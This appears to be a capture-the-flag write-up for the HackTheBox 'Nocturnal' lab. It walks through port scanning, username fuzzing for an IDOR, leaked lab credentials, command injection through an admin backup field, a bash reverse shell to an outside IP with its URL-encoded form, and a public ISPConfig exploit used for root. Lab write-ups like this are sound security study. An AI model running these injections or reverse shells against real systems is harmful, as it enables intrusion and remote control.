Nocturnal

Enumeration

Nmap

nmap -p- --open -sCV --top-ports 500 10.10.11.64 -oG allPorts
#################################################################
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
|   256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|_  256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web

Basic virtual hosting

We can create a new account and login to see an upload file camp -->

I can try to upload a image and the response of the web service is -->

So... I will go to download a randowm pdf and try to upload it

We can see it and the web site target here -->

Explotation

So... it get us a pdf, pdf injection?? maybe... but it is a easy machine... We can see a possible IDOR?

http://nocturnal.htb/view.php?username={username}&file=someTest.pdf

We can ffuf with commonds usersernames with intruder -->

I use two dicctionaies names.txt

We can do it enumeration with fuff to:

ffuf -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -u 'http://nocturnal.htb/view.php?username=FUZZ&file=test.pdf' -H 'Cookie: PHPSESSID=olt58v8arrqqotc1ckci6q7qlq' -fs 2985

While, I tested some test names and pdfs and i can found it -->

So... maybe, the main extension use is .odt

Continue with the enumertaion users -->

Target to amanda and tobias user (but online are information into amanda) -->

amanda:arHkG7HAI68X8s1J

So... I can try to connect in ssh, or login into the web -->

NICE! We are amanda admin, go to the admin panel -->

We can download a backup use the admin passwd and download a zip with all files -->

Intro admin.php we can see it

The name that we input, the source html/url encode... and interprete with php. Maybe we can execute commands with for example it -->

bash -c "whaomi"
## URL Encode
bash%2b-c%2b"whoami"

NICE! We can try to read the /etc/passwd and execute command in this camp, so, try to get a revershell

JUM... now revershell -->

bash -c 'bash -i >& /dev/tcp/10.10.14.163/1234 0>&1'
##URL Encode
bash%2b-c%2b'bash%2b-i%2b>%2526%2b/dev/tcp/10.10.14.163/1234%2b0>%25261'

NOTHING... so.. we can do backups of others directories inside the service?

We can see into the register.php previously download of the backup, a internal db directory

After search.. I found a method base64 encode -->

Its is MD5 Hahes -->

tobias:slowmotionapocalypse

We can try to connect via SSH -->

ssh tobias@10.10.11.64

User Flag

We can see here a internal 8080 website run, we can do ssh tunneling for view it -->

ssh -L 8080:127.0.0.1:8080 tobias@10.10.11.64

admin:slowmotionapocalypse

After a long enumeration, i can see this CVE -->

GitHub - ajdumanhug/CVE-2023-46818: CVE-2023-46818 Python3 Exploit for ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection VulnerabilityGitHub

Root Flag

Download and Ejecute the script -->

PreviousCode NextPlanning

Last updated 1 month ago